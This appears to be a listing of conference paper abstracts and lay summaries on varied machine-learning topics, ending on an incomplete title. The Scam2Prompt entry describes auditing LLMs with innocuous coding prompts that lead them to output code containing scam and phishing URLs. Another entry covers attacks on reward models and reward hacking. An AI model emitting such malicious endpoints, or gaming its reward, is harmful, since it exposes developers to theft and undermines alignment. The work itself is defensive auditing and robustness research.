Large language models (LLMs) are enabling reasoning over 2D and 3D structures, yet existing methods remain modality-specific and typically compress structural inputs through sequence-based tokenization or fixed-length query connectors. Such architectures either omit the geometric grounding requisite for mitigating structural hallucinations, or impose inflexible modality fusion bottlenecks that concurrently over-compress and suboptimally allocate structural tokens, thereby impeding the realization of generalized all-atom reasoning. We introduce **Cuttlefish**, a unified multimodal LLM that grounds language reasoning in geometric cues while scaling modality tokens with structural complexity. First, **Scaling-Aware Patching** leverages an instruction-conditioned gating mechanism to generate variable-size patches over structural graphs, adaptively scaling the query token budget with structural complexity to mitigate fixed-length connector bottlenecks. Second, **Geometry Grounding Adapter** refines these adaptive tokens via cross-attention to modality embeddings and injects the resulting modality tokens into the LLM, exposing explicit geometric cues to reduce structural hallucination. Experiments across interdisciplinary all-atom benchmarks demonstrate that Cuttlefish achieves superior performance in heterogeneous structure-grounded reasoning. Code: github.com/zihao-jing/Cuttlefish.
Summary
Large language models are increasingly expected to reason beyond plain text, including over objects, systems, and structures with complex spatial or relational information. However, most existing methods still convert these inputs into fixed or simplified representations. This can discard important details, especially when the input size varies greatly, and may cause the model to generate explanations that are not grounded in the actual structure.
This paper introduces Cuttlefish, a framework that helps language models reason over structured inputs more reliably. Instead of forcing every input into the same fixed token budget, Cuttlefish dynamically allocates more tokens to more complex structures and fewer tokens to simpler ones. It also injects explicit structural evidence into the language model, so the model’s responses are better tied to the input rather than inferred from text patterns alone.
In simple terms, Cuttlefish gives language models a more flexible and evidence-grounded way to understand complex structures. This improves their ability to reason over variable-sized structured data and reduces unsupported or hallucinated explanations.
TLDR: Cuttlefish enables LLMs to reason over complex variable-size structures by adaptively allocating tokens and grounding responses in explicit structural evidence.
Scaling Generative Verifiers For Natural Language Mathematical Proof Verification And Selection
Sadegh Mahdavi, Branislav Kisacanin, Shubham Toshniwal, Wei Du, Ivan Moshkov, George Armstrong, Renjie Liao (Vector Faculty Member), Christos Thrampoulidis, Igor Gitman
Abstract
Large language models have achieved remarkable success on final-answer mathematical problems, largely due to the ease of applying reinforcement learning with verifiable rewards. However, the reasoning underlying these solutions is often flawed. Advancing to rigorous proof-based mathematics requires reliable proof verification capabilities. We begin by analyzing multiple evaluation setups and show that focusing on a single benchmark can lead to brittle or misleading conclusions. To address this, we evaluate both proof-based and final-answer reasoning to obtain a more reliable measure of model performance. We then scale two major generative verification methods (GenSelect and LLM-as-a-Judge) to millions of tokens and identify their combination as the most effective framework for solution verification and selection. We further show that the choice of prompt for LLM-as-a-Judge significantly affects the model’s performance, but reinforcement learning can reduce this sensitivity. However, despite improving proof-level metrics, reinforcement learning does not enhance final-answer precision, indicating that current models often reward stylistic or procedural correctness rather than mathematical validity. Our results establish practical guidelines for designing and evaluating scalable proof-verification and selection systems.
Summary
AI systems are becoming very good at finding final answers to math problems, but a right answer can still be backed by a faulty explanation. This matters because advanced mathematics, such as olympiad-style problems, requires a proof that every step is logically sound. In this work, we study how to automatically check and select AI-generated mathematical proofs. We find that judging proofs using only one benchmark can be misleading, because AI checkers may learn shortcuts from the dataset instead of truly checking the math. To address this, we evaluate proof checkers using both full proof correctness and final-answer correctness. We also study two ways of using extra computing effort: comparing candidate proofs against each other and asking an AI judge to score individual proofs several times. The best practical strategy combines these ideas, first narrowing down candidates through comparisons and then using repeated judging to choose the final proof. Training the judge with reinforcement learning makes it less sensitive to prompt wording, but does not reliably improve its ability to check the underlying mathematics. Our results provide guidance for building better mathematical proof checkers, while showing that human review is still important for difficult or high-stakes proofs.
TLDR: We study LLM-based verification and selection methods for natural language mathematical proof generation
Scam2Prompt: A Scalable Framework for Auditing Malicious Scam Endpoints in Production LLMs
Zhiyang Chen, Tara Saba, Xun Deng, Xujie Si (Vector Faculty Affiliate), Fan Long
Abstract
The insatiable demand for web-scale training data has exposed LLMs to a subtle but consequential threat: the absorption of malicious scam content into model weights and its subsequent reproduction during inference. In November 2024, this risk materialized when a developer reportedly lost 2,500 USD after ChatGPT generated an otherwise routine cryptocurrency trading script containing a live phishing URL. To systematically investigate this problem, we introduce Scam2Prompt, an automated auditing framework that crawls known scam websites, infers their functional intent, and synthesizes innocuous developer-style prompts — the kind of legitimate coding requests a programmer might naturally submit — to evaluate whether LLMs reproduce the underlying scam endpoints. Importantly, our approach requires neither jailbreaking nor adversarial prompting; all 1,377 prompts in our benchmark, Innoc2Scam-bench, which is automatically constructed by Scam2Prompt, were human-validated as benign coding tasks. Evaluation of seven production LLMs released in 2025 on Innoc2Scam-bench shows that the vulnerability proves both persistent and severe: malicious code generation rates range from 12.9% to 47.3% across the evaluated models, and no tested model proves immune. State-of-the-art guardrails and RAG-based agents offer only limited protection, underscoring an urgent need for explicit URL validation in LLM-assisted software development pipelines.
Summary
AI coding assistants now write a huge share of the world’s software, but they learn from the open internet — a place packed with scams. In November 2024, a developer lost 2,500 USD after ChatGPT generated a cryptocurrency trading script that quietly sent his wallet’s private key to a phishing website. How widespread is this problem, and which AI assistants are affected? We built Scam2Prompt, an automated detective that hunts for scam links hidden inside popular AI coding tools. Our system writes the kind of innocent coding question any programmer might naturally ask — but on topics that scammers crowd too, like flight booking, coupons, and digital currencies — then checks whether the AI’s answer secretly contains a link to a scam site. No tricks or jailbreaking required. We tested seven of the newest AI assistants from major companies including GPT-5 and Gemini 2.5 Pro. Every single one produced code laced with scam URLs, between 13% and 47% of the time. Along the way, our tool uncovered 62 previously unknown live phishing websites that had quietly lurked inside the AI’s “memory” for over a year, evading conventional security tools. We released our benchmark publicly so the community can measure progress on fixing this industry-wide blind spot.
TLDR: Scam2Prompt automatically audits LLMs by synthesizing developer-style prompts that trigger LLMs to generate malicious code with scam URLs. A curated subset of prompts can still trigger high malicious code generation rates across 7 SOTA LLMs in 2025.
Segmentation From Attention: Training-Free Layer Selection and One-Shot Tuning for Segmentation in VLMs
Mir Rayat Imtiaz Hossain, Mennatullah Siam, Leonid Sigal (Vector Faculty Member), James Little
Abstract
Large-scale vision-language models (VLMs), trained on extensive datasets of image-text pairs, exhibit strong multimodal understanding capabilities by implicitly learning associations between textual descriptions and image regions. This emergent ability enables zero-shot object detection and segmentation, using techniques that rely on text-image attention maps, without necessarily training on abundant labeled segmentation datasets. However, performance of such methods depends heavily on prompt engineering and manually selected layers or head choices for the attention layers. In this work, we propose a training-free entropy-based measure, InfoScore, to identify the best image-text attention layers for segmentation, providing a more flexible and scalable solution for training-free open-vocabulary segmentation, reducing the additional burden of hyperparamter search. We empirically show that our training-free selection strategy is superior to naive selection strategies. Additionally, we demonstrate that instead of solely relying on text prompts, fine-tuning the image-text attention layer with a single visual example of each class significantly improves segmentation without the need of additional parameters or decoders. Moreover, we show that our methods and findings are general and can be applied across various vision-language models (VLMs).
Self-Soupervision: Cooking Model Soups without Labels
Spotlight paper
Anthony Fuller, James Green, Evan Shelhamer (Vector Faculty Member)
Abstract
Model soups are strange and strangely effective combinations of parameters. They take a model (the stock), fine-tune it into multiple models (the ingredients), and then mix their parameters back into one model (the soup) to improve predictions. While all known soups require supervised learning, and optimize the same loss on labeled data, our recipes for Self-Soupervision generalize soups to self-supervised learning (SSL). Our Self-Souping lets us flavor ingredients on new data sources, e.g. from unlabeled data from a task for transfer or from a shift for robustness. We show that Self-Souping on corrupted test data, then fine-tuning back on uncorrupted train data, boosts robustness by +3.5% (ImageNet-C) and +7% (LAION-C). Self-Soupervision also unlocks countless SSL algorithms to cook the diverse ingredients needed for more robust soups. We show for the first time that ingredients can differ in their SSL hyperparameters—and more surprisingly, in their SSL algorithms. We cook soups of MAE, MoCoV3, MMCR, and LeJEPA ingredients that are more accurate than any single SSL ingredient.
Summary
We create machine-learning models by training them to recognize things in images by giving them many image-annotation pairs. The learned algorithm, which does the recognizing, is a set of weights that perform mathematical operations on the input image to make an output-annotation prediction. Combining the weights of many models into a single model is called a model soup, which can perform better than any of the models that went into it—called ingredients—without increasing the cost of making predictions because the number of mathematical operations is not changed.
In our work, we make model soups by combining ingredient models that we train without annotations. We make these ingredients without annotations in different ways, for example, training a model to predict hidden patches or to represent the same image in the same way regardless of its color or orientation. Our work makes model soups more general since we no longer need human-annotated datasets for which to create ingredients and soups.
TLDR: Our Self-Soupervision generalize model soups to self-supervised learning for improved robustness.
SMAC: Score-Matched Actor-Critics for Robust Offline-to-Online Transfer
Nathan S. de Lara, Florian Shkurti (Vector Faculty Member)
Abstract
Modern offline Reinforcement Learning (RL) methods find performant actor-critics, however, fine-tuning these actor-critics online with value-based RL algorithms typically causes immediate drops in performance. We provide evidence consistent with the hypothesis that, in the loss landscape, offline maxima for prior algorithms and online maxima are separated by low-performance valleys that gradient-based fine-tuning traverses. Following this, we present Score Matched Actor-Critic (SMAC), an offline RL method designed to learn actor–critics that transition to online value-based RL algorithms with no drop in performance. SMAC avoids valleys between offline and online maxima by regularizing the Q-function during the offline phase to respect a first-order derivative equality between the score of the policy and action-gradient of the Q-function. We experimentally demonstrate that SMAC converges to offline maxima that are connected to better online maxima via paths with monotonically increasing reward found by first-order optimization. SMAC achieves smooth transfer to Soft Actor-Critic and TD3 in 6/6 D4RL tasks. In 4/6 environments, it reduces regret by 34-58% over the best baseline.
Summary
This paper studies a practical problem in reinforcement learning: how to take a policy trained from old, offline data and safely improve it through new online experience.
Offline reinforcement learning can learn strong policies without interacting with the environment, which is useful when real-world interaction is expensive or risky. But when these offline-trained agents are later fine-tuned online with standard RL algorithms, they often get worse before they get better. That early performance drop is dangerous in settings like robotics, where a bad policy during fine-tuning can cause real failures.
The paper argues that this drop happens because many offline RL methods find solutions that are good on their own, but poorly positioned for online fine-tuning. In the space of neural network parameters, the offline solution and the online solution may be separated by a low-performance region. So when gradient-based fine-tuning moves from one to the other, the agent temporarily passes through a bad policy.
The proposed method, Score-Matched Actor-Critic (SMAC), tries to train offline agents that are not just good initially, but also easier for online RL algorithms to keep improving. It does this by shaping the critic so that its action preferences resemble the structure expected by online actor-critic methods like SAC. In simpler terms, SMAC trains the value function to point the policy toward actions that look both data-supported and compatible with later online learning.
Across several benchmark tasks, SMAC avoids the sharp performance drops seen in prior offline RL methods. It fine-tunes smoothly with SAC and TD3, and often achieves much lower online regret, meaning it wastes fewer online interactions performing poorly. The broader message is that offline RL should not only optimize for the best offline checkpoint; it should optimize for checkpoints that sit on a good path toward future online improvement.
TLDR: Offline RL fine-tuning fails because offline and online optima are disconnected in the loss landscape. SMAC uses score-matching regularization on the Q-function to ensure connectivity, enabling smooth transfer to online algorithms.
SparseOpt: Addressing Normalization-induced Gradient Skew in Sparse Training
Adnan Mohammed, Rohan Jain, Tom Jacobs, Ekansh Sharma, Rahul G. Krishnan (Vector Faculty Member), Rebekka Burkholz, Yani Ioannou
Abstract
Dynamic Sparse Training (DST) methods train neural networks by maintaining sparsity while dynamically adapting the network topology. Despite the promise of reduced computation, DST methods converge significantly slower than dense training, often requiring comparable training time to achieve similar accuracy. We demonstrate both analytically and empirically that Batch Normalization (BN) adversely affects sparse training, and propose SparseOpt — a sparsity-aware optimizer — to address this. Experiments on ResNet models across CIFAR-100 and ImageNet demonstrate consistently faster convergence and improved generalization with our proposed method. Our work highlights the limitations of current normalization layers in sparse training and provides the first systematic study of the interaction between Batch Normalization, sparse layers, and DST, taking a significant step toward making DST practically competitive with dense training.
Summary
Sparse training aims to train neural networks using only a small fraction of the connections, instead of using every parameter in the network. Since fewer connections are active, sparse training has the potential to significantly reduce the computational and memory cost of training large models. However, in practice, sparse neural networks are much harder to train than standard dense networks. Existing sparse training methods often converge substantially slower and may require significantly longer training schedules to match the accuracy of dense models, limiting their practical efficiency benefits.
To stabilize and accelerate the training of deep neural networks, modern architectures almost universally rely on normalization layers such as Batch Normalization (BN). Intuitively, BN keeps activations and gradients well-scaled during training, which helps optimization remain stable and enables faster convergence. While BN has been extensively studied in dense neural networks, prior work largely assumed that it behaves similarly in sparse networks. In this work, we show both theoretically and empirically that this assumption does not hold. Specifically, we demonstrate that BN interacts poorly with heterogeneous sparse connectivity, leading to neuron-dependent gradient scaling that distorts optimization dynamics and destabilizes Dynamic Sparse Training (DST).
Motivated by this observation, we propose a simple sparsity-aware correction method, SparseOpt, that accounts for the gradient imbalance introduced by BN. Our method improves optimization stability, accelerates convergence, and consistently improves sparse training performance across multiple datasets and architectures.
TLDR: Batch Normalization adversely affects sparse training; we proposed a sparsity-aware optimization method to mitigate this and improves training convergence and generalization.
Stable Velocity: A Variance Perspective on Flow Matching
Donglin Yang, Yongxing Zhang, Xin Yu, Liang Hou, Xin Tao, Pengfei Wan, Xiaojuan Qi, Renjie Liao (Vector Faculty Member)
Abstract
While flow matching is elegant, its reliance on single-sample conditional velocities leads to high-variance training targets that destabilize optimization and slow convergence. By explicitly characterizing this variance, we identify 1) a *high-variance regime* near the prior, where optimization is challenging, and 2) a *low-variance regime* near the data distribution, where conditional and marginal velocities nearly coincide. Leveraging this insight, we propose **Stable Velocity**, a unified framework that improves both training and sampling. For training, we introduce Stable Velocity Matching (StableVM), an unbiased variance-reduction objective, along with Variance-Aware Representation Alignment (VA-REPA), which adaptively strengthen auxiliary supervision in the *low-variance regime*. For inference, we show that dynamics in the *low-variance regime* admit closed-form simplifications, enabling Stable Velocity Sampling (StableVS), a finetuning-free acceleration. Extensive experiments on ImageNet $256\times256$ and large pretrained text-to-image and text-to-video models, including SD3.5, Flux, Qwen-Image, and Wan2.2, demonstrate consistent improvements in training efficiency and more than $2\times$ faster sampling within the *low-variance regime* without degrading sample quality. Our code is available at https://github.com/linYDTHU/StableVelocity.
Summary
Modern generative models can create high-quality images and videos, but training them efficiently remains challenging. One reason is that the learning signals they rely on can be very noisy, especially in the early stages of generation, which makes training unstable and slow.
In this work, we analyze where this noise comes from and show that it is much higher when the model starts from random inputs, but becomes much lower as the model gets closer to real data. Based on this observation, we propose a new method called Stable Velocity that improves both training and generation.
During training, our method reduces noise in the learning signals and focuses more on the parts of the process that are easier to learn. During generation, we take advantage of simpler dynamics in the low-noise region to speed up sampling without additional training.
Our approach consistently makes training more efficient and can generate images and videos more than twice as fast, while maintaining the same quality.
τ²-Bench: Evaluating Conversational Agents in a Dual-Control Environment
Spotlight paper
Victor Barres, Honghua Dong, Soham Ray, Xujie Si (Vector Faculty Affiliate), Karthik Narasimhan
Abstract
Existing benchmarks for conversational AI agents simulate *single-control* environments, where only the AI agent can use tools to interact with the world, while the user remains a passive information provider. This differs from real-world scenarios like technical support, where users need to actively participate in modifying the state of the (shared) world. In order to address this gap, we introduce
τ²-bench, with four key contributions:
- A novel **Telecom dual-control domain** modeled as a Dec-POMDP, where both agent and user make use of tools to act in a shared, dynamic environment that tests both agent coordination and communication,
- A **compositional task generator** that programmatically creates diverse, verifiable tasks from atomic components, ensuring domain coverage and controlled complexity,
- A **reliable user simulator** tightly coupled with the environment, whose behavior is constrained by tools and observable states, improving simulation fidelity,
- **fine-grained analysis of agent performance** through multiple ablations including separating errors arising from reasoning vs communication/coordination.
In particular, our experiments show significant performance drops when agents shift from no-user to dual-control, highlighting the challenges of guiding users. Overall,
τ²-bench provides a controlled testbed for agents that must both reason effectively and guide user actions.
Summary
Today’s tests for AI customer-service assistants place the AI in a world where only it can take actions, while the user just talks. But in real support — like calling about a broken phone — the user must also act, restarting devices or toggling settings, while the agent guides them. To address this gap, we introduce τ²-bench, with four contributions: 1) a new telecom support task where both the AI and a simulated user can take actions on a shared system; 2) an automatic task generator that builds varied, solvable problems from a small set of reusable building blocks; 3) a user simulator whose actions are kept predictable and consistent with what is actually possible by tying it to the environment rather than prompts alone; and 4) measurements that separate the AI’s reasoning errors from its communication errors. Experiments show that even the best current assistants succeed on only 34–49% of new tasks, with performance dropping about 20% when the AI must guide a user instead of acting alone. τ²-bench gives researchers a way to measure and improve this gap before AI assistants reach customer-facing roles. Code, data, and a leaderboard are at taubench.com.
TLDR: τ²-bench introduces a new way to test AI agents by letting both the agent and a simulated user interact in a shared “telecom” world. This allows for creating diverse, verifiable tasks and better user simulation.
Talk, Judge, Cooperate: Gossip-Driven Indirect Reciprocity in Self-Interested LLM Agents
Shuhui Zhu, Yue Lin, Shriya Kaistha, Wenhao Li, Baoxiang Wang, Hongyuan Zha, Gillian Hadfield (Vector Faculty Member), Pascal Poupart (Vector Faculty Member)
Abstract
Indirect reciprocity, which means helping those who help others, is difficult to sustain among decentralized, self-interested LLM agents without reliable reputation systems. We introduce Agentic Linguistic Gossip Network (ALIGN), an automated framework where agents strategically share open-ended gossip using hierarchical tones to evaluate trustworthiness and coordinate social norms. We demonstrate that ALIGN consistently improves indirect reciprocity and resists malicious entrants by identifying and ostracizing defectors without changing intrinsic incentives. Notably, we find that stronger reasoning capabilities in LLMs lead to more incentive-aligned cooperation, whereas chat models often over-cooperate even when strategically suboptimal. These results suggest that leveraging LLM reasoning through decentralized gossip is a promising path for maintaining social welfare in agentic ecosystems.
Summary
As large language model agents begin to represent different users, companies, or institutions, their interests may not always be aligned. In partially conflicting scenarios, agents may act in their own interest, which can make cooperation difficult: an agent may benefit from taking help without helping others in return.
This paper studies whether public gossip can help address this problem. We introduce ALIGN, a framework where agents can broadcast public messages about how others behaved, such as praising helpful behavior or criticizing selfish behavior. These messages help agents build reputations and decide whom to trust in future interactions.
Across several simulated environments, we find that public gossip can help self-interested language-model agents cooperate more and achieve better outcomes, without directly changing their rewards or forcing them to be altruistic. The system can also reduce harm from selfish or malicious agents by spreading negative reports about repeated bad behavior. Our results suggest that open-ended language can serve as an adaptive reputation mechanism for future multi-agent AI systems, while also highlighting the need for safeguards against false gossip, unfair exclusion, and misuse of reputation systems.
TLDR: ALIGN enables self-interested LLM agents to sustain indirect reciprocity through open-ended public gossip that transmits reputational signals.
Temporal Straightening for Latent Planning
Ying Wang, Oumayma Bounou, Gaoyue Zhou, Randall Balestriero, Tim G. J. Rudner (incoming Vector Faculty Member), Yann LeCun, Mengye Ren
Abstract
Learning good representations is essential for latent planning with world models. While pretrained visual encoders produce strong semantic visual features, they are not tailored to planning and contain information irrelevant—or even detrimental—to planning. Inspired by the perceptual straightening hypothesis in human visual processing, we introduce temporal straightening to improve representation learning for latent planning. Using a curvature regularizer that encourages locally straightened latent trajectories, we jointly learn an encoder and a predictor of a Joint-Embedding Predictive Architecture (JEPA) world model. We show that reducing curvature this way makes the Euclidean distance in latent space a better proxy for the geodesic distance and improves the conditioning of the planning objective. We demonstrate empirically that temporal straightening makes gradient-based planning more stable and yields significantly higher success rates across a suite of goal-reaching tasks. Our code is in https://agenticlearning.ai/temporal-straightening.
Summary
A world model learns to predict how the world will change given the current state and action, then uses those predictions for planning. However, in many latent world models, the learned representation is not naturally organized for planning and control: trajectories that are feasible in the real environment can become highly curved in latent space, making prediction and planning hard.
TLDR: We introduce temporal straightening to improve representation learning for world modeling and latent planning.
Test-Time Graph Search for Goal-Conditioned Reinforcement Learning
Evgenii Opryshko, Junwei Quan, Claas Voelcker, Yilun Du, Igor Gilitschenski (Vector Faculty Member)
Abstract
Offline goal-conditioned reinforcement learning (GCRL) often struggles with long-horizon tasks, where errors in value estimation accumulate and produce unreliable policies. It is typically assumed that effective long-term planning is infeasible without specialized training. In contrast, our work demonstrates that existing GCRL policies can complete long-horizon tasks when combined with a lightweight, training-free planning wrapper. We find that standard goal-conditioned value functions encode locally consistent geometric structure sufficient for planning. Our approach, Test-Time Graph Search (TTGS), constructs a graph over the offline dataset and employs an adaptive subgoal selection strategy. To address unreliable value estimates during shortest-path search, we propose a novel mechanism that softly penalizes long-distance transitions. Our method incurs negligible computational overhead and requires no additional supervision or parameter updates. On the OGBench benchmark, TTGS significantly boosts success rates across multiple base learners and tasks, with primary gains on challenging long-horizon locomotion tasks where some success rates are improved from near-zero to over 90\%, often matching or outperforming methods that require complex auxiliary training. Code and videos can be found at https://ktolnos.github.io/ttgs.
Summary
Teaching an AI agent to perform a long sequence of actions is much harder than teaching it short ones: small mistakes accumulate, and the agent gets lost. Existing fixes add generative planners or extra neural networks, but they are heavy and require redoing the training pipeline. We asked whether an agent that already takes reliable short steps could handle long journeys without any retraining.
We built Test-Time Graph Search (TTGS), a lightweight tool that wraps around an already-trained agent. It treats observations from the training data as waypoints on a map and connects them using the agent’s own sense of how close two situations are. A shortest-path search picks a chain of nearby waypoints that guides the agent one short step at a time. Because the agent’s sense of distance is trustworthy for nearby places but noisy for far ones, we bias the search toward paths made of many small hops rather than a few long, uncertain ones.
On a standard benchmark, TTGS lifted success rates on the hardest navigation tasks from near zero to over 90%, while adding less than a second of computation. This lets practitioners unlock long-horizon performance from agents they have already trained, without extra data or training.
TLDR: Test-Time Graph Search (TTGS) demonstrates that value-derived distances from standard pretrained GCRL agents can guide subgoal planning across dataset states, improving performance without further training.
TextResNet: Decoupling and Routing Optimization Signals in Compound AI Systems via Deep Residual Tuning
Suizhi Huang, Mei Li, Han Yu, Xiaoxiao Li (Vector Faculty Member)
Abstract
Textual Gradient-style optimizers (TextGrad) enable gradient-like feedback propagation through compound AI systems. However, they do not work well for deep chains. The root cause of this limitation stems from the *Semantic Entanglement* problem in these extended workflows. In standard textual backpropagation, feedback signals mix local critiques with upstream contexts, leading to *Attribution Ambiguity*. To address this challenge, we propose TextResNet, a framework that reformulates the optimization process to achieve precise signal routing via four key innovations. Firstly, in the forward pass, it enforces Additive Semantic Deltas to preserve an Identity Highway for gradient flow. Secondly, in the backward pass, it introduces Semantic Gradient Decomposition via a Semantic Projector to disentangle feedback into causally independent subspaces. Thirdly, it implements Causal Routing, which routes projected signals to their specific components. Finally, it performs Density-Aware Optimization Scheduling to leverage the disentangled signals to dynamically allocate resources to key system bottlenecks. Our results show that TextResNet not only achieves superior performance compared to TextGrad, but also exhibits remarkable stability for agentic tasks in compound AI systems where baselines collapse. Code is available at https://github.com/JeanDiable/TextResNet.
Summary
Modern artificial intelligence (AI) systems are increasingly built from multiple specialized AI agents working together in a chain—for example, one agent searches the web, another summarizes the text, and a third writes the final answer. However, automatically improving these multi-agent systems is highly challenging. When the final answer is incorrect, existing tools struggle to pinpoint which agent made the mistake, resulting in generic feedback that causes the wrong agents to attempt unnecessary fixes.
To address this, we developed TextResNet. Inspired by how computer networks manage traffic, TextResNet preserves the original information from each step and uses a helper AI to split error feedback into clean, distinct categories: mistakes caused locally versus those passed down from earlier steps. It then routes targeted feedback only to the agent responsible for the error, while a smart scheduling system focuses optimization efforts on the system’s biggest bottlenecks.
Our method makes cooperative AI systems significantly more stable and accurate. It also consumes three times fewer computing resources, paving the way for more reliable, cost-efficient, and easily debuggable multi-agent AI applications.
TLDR: TextResNet fixes Semantic Entanglement via an Identity Highway and Semantic Projector. It ensures stable feedback routing and outperforms baselines in deep AI system optimization.
ToaSt: Token Channel Selection and Structured Pruning for Efficient ViT
Hyunchan Moon, Cheonjun Park, Steven Waslander (Vector Faculty Affiliate)
Abstract
Vision Transformers (ViTs) have achieved remarkable success across various vision tasks, yet their deployment is often hindered by prohibitive computational costs. While structured weight pruning and token compression have emerged as promising solutions, they suffer from prolonged retraining and inter-layer dependencies that complicate optimization, respectively. We propose ToaSt, a decoupled framework applying specialized strategies to distinct ViT components. We apply coupled head-wise structured pruning to Multi-Head Self-Attention modules, leveraging attention operation characteristics to enhance robustness. For Feed-Forward Networks (over 60\% of FLOPs), we introduce Token Channel Selection (TCS), a training-free method that filters redundant noise channels at inference time. Extensive evaluations across nine diverse models, including DeiT, ViT-MAE, and Swin Transformer, demonstrate that ToaSt achieves superior trade-offs between accuracy and efficiency, consistently outperforming existing baselines. On ViT-MAE-Huge, ToaSt achieves 88.52\% accuracy (+1.64\%p) with 39.4\% FLOPs reduction. ToaSt also transfers effectively to diverse downstream tasks (COCO detection, ADE20K segmentation, CIFAR-100 classification), achieving 52.2 versus 51.9 mAP on COCO. Code: https://github.com/SHANNonLab-HUFS/ToaSt
Summary
Modern AI systems that understand images — from medical scans to self-driving cars to photo search — have become remarkably powerful, but also remarkably expensive to run. They demand massive computation, making them slow and costly to deploy on everyday devices like phones, drones, and cameras.
We developed ToaSt, a method that makes these AI models smaller and faster while keeping their accuracy intact. Like trimming a tree by removing dead branches, ToaSt identifies parts of the model that contribute little to its decisions and removes them. Unlike most existing techniques, ToaSt requires no additional training, so it can be applied instantly to any pretrained model.
Tested across nine different image-recognition models, ToaSt reduced computation by up to 40 percent without losing accuracy — and in several cases, the slimmer models became slightly more accurate, because removing noisy components helped the model focus on what matters. The method also transferred smoothly to other tasks, including object detection and scene segmentation.
By cutting the cost of running AI vision systems, our work helps bring these technologies to more devices and more users, while reducing the energy footprint of increasingly large AI models.
TLDR: Structured Weight & Token Channel Pruning
TokSuite: Measuring the Impact of Tokenizer Choice on Language Model Behavior
Spotlight paper
Gül Sena Altıntaş, Malikeh Ehghaghi, Brian Lester, Fengyuan Liu, Wanru Zhao, Marco Ciccone (Vector Distinguished Postdoctoral Fellow), Colin Raffel (Vector Faculty Member)
Abstract
Tokenizers provide the fundamental basis through which text is represented and processed by language models (LMs). Despite the importance of tokenization, its role in LM performance and behavior is poorly understood due to the challenge of measuring the impact of tokenization in isolation. To address this need, we present TokSuite, a collection of models and a benchmark that supports research into tokenization’s influence on LMs. Specifically, we release fourteen pre-trained models that use different off-the-shelf tokenizers but are otherwise identical, using the same architecture, dataset, training budget, and initialization. We also release a multilingual robustness benchmark that measures model performance under real-world perturbations in English, Chinese, Farsi, Italian, and Turkish, curated by native annotators. Together, TokSuite allows robust decoupling of the influence of a model’s tokenizer, supporting a series of novel findings that elucidate the respective benefits and shortcomings of a wide range of popular tokenizers.
Summary
Before a language model reads any text, it first splits it into small pieces called “tokens” from a fixed, limited vocabulary. Unlike humans, who can encounter a new word and learn it as its own, language models can only work with units they already know. For example, the word “doctor” might be split into “doc” and “tor”. This process, called tokenization, is one of the earliest decisions made when building a language model, yet it is often treated as an afterthought, with many models simply borrowing whatever tokenizer a previous model used. We study how much this choice actually matters.
The challenge is that existing models differ in too many ways (their size, training data, architecture), making it hard to pin performance differences on the tokenizer alone. So we trained 14 models that are identical in every way except for their tokenizer, and paired them with a new benchmark of about 5,000 test cases covering real-world language variations across five languages, as well as mathematical notation and scientific content, all curated by native speakers.
We found that tokenizer design consistently shapes how robust a model is to everyday imperfections like typos, foreign scripts, or formatted equations, more so than model size or training duration. Even a tiny whitespace difference inside a math formula could cause a model to fail completely. We hope TokSuite helps the community make more informed tokenizer choices in the future.
TLDR: We train fourteen models identical except for tokenization and evaluate tokenization effects on a custom multilingual benchmark designed specifically for tokenization.
Unifying Adversarial Robustness and Training Across Text Scoring Models
Manveer Tamber, Hosna Oyarhoseini, Jimmy Lin (Vector Faculty Affiliate)
Abstract
Research on adversarial robustness in language models is currently fragmented across applications and attacks, obscuring shared vulnerabilities. In this work, we propose unifying the study of adversarial robustness in text scoring models spanning dense retrievers, rerankers, and reward models. This motivates adapting both attacks and adversarial training methods across model roles. Unlike open-ended generation, text scoring failures are directly testable: an attack succeeds when an irrelevant or rejected text outscores a relevant or chosen one. Using this principled lens of text scoring, we demonstrate that current adversarial training formulations for language models are often short-sighted, failing to effectively generalize across attacks. To address this, we introduce multiple adversarial training methods for text scoring models and show that combining complementary training methods can yield strong robustness while also improving task effectiveness. We also highlight the practical value of our approach for RLHF, showing that our adversarially trained reward models mitigate reward hacking and support the training of better-aligned LLMs. We provide our code and models for further study.
Summary
Language models can be fooled by small changes to their inputs, but research on this problem is usually split across different applications and attack types, which hides common weaknesses. We bring these together by focusing on models that assign scores to text, including search models that rank results and reward models that judge LLM responses. In this setting, an attack is simple to define: irrelevant or bad text should not score higher than relevant or good text. We find that common defenses for training more robust models often fail to carry over across attacks, while combining different defensive training methods gives much broader protection without hurting downstream task accuracy, and sometimes even improving it. When used to train LLMs with reinforcement learning, our more robust reward models are also harder to game and lead to better-aligned LLMs.
Variational Flow Maps: Make Some Noise for One-Step Conditional Generation
Abbas Mammadov, So Takao, Bohan Chen, Ricardo Baptista (Vector Faculty Affiliate), Morteza Mardani, Yee-Whye Teh, Julius Berner
Abstract
Flow maps enable high-quality image generation in a single forward pass. However, unlike iterative diffusion models, their lack of an explicit sampling trajectory impedes incorporating external constraints for conditional generation and solving inverse problems. We put forth _Variational Flow Maps_, a framework for conditional sampling that shifts the perspective of conditioning from “guiding a sampling path”, to that of “learning the proper initial noise”. Specifically, given an observation, we seek to learn a _noise adapter model_ that outputs a noise distribution, so that after mapping to the data space via flow map, the samples respect the observation and data prior. To this end, we develop a principled variational objective that jointly trains the noise adapter and the flow map, improving noise-data alignment, such that sampling from complex data posterior is achieved with a simple adapter. Experiments on various inverse problems show that VFMs produce well-calibrated conditional samples in a single (or few) steps. For ImageNet, VFM attains competitive fidelity while accelerating the sampling by orders of magnitude compared to alternative iterative diffusion/flow models.
Summary
In contrast to iterative diffusion models, one/few-step generative models such as flow maps cannot naturally solve inverse problem (e.g. image de-blurring, inpainting, etc…) due to the lack of a sampling trajectory, which one can use to steer towards high-likelihood regions. To address this problem, we shifted the perspective of conditioning from “guiding a sampling path” to “finding the initial noise” that leads to high-likelihood samples. This helps to solve a wide variety of inverse problems, as well as more general reward alignment problems, while retaining the blazing fast inference speed of one/few-step flow maps.
TLDR: We propose a method for one-step conditional generation by tilting the noise space.
A Very Big Video Reasoning Suite
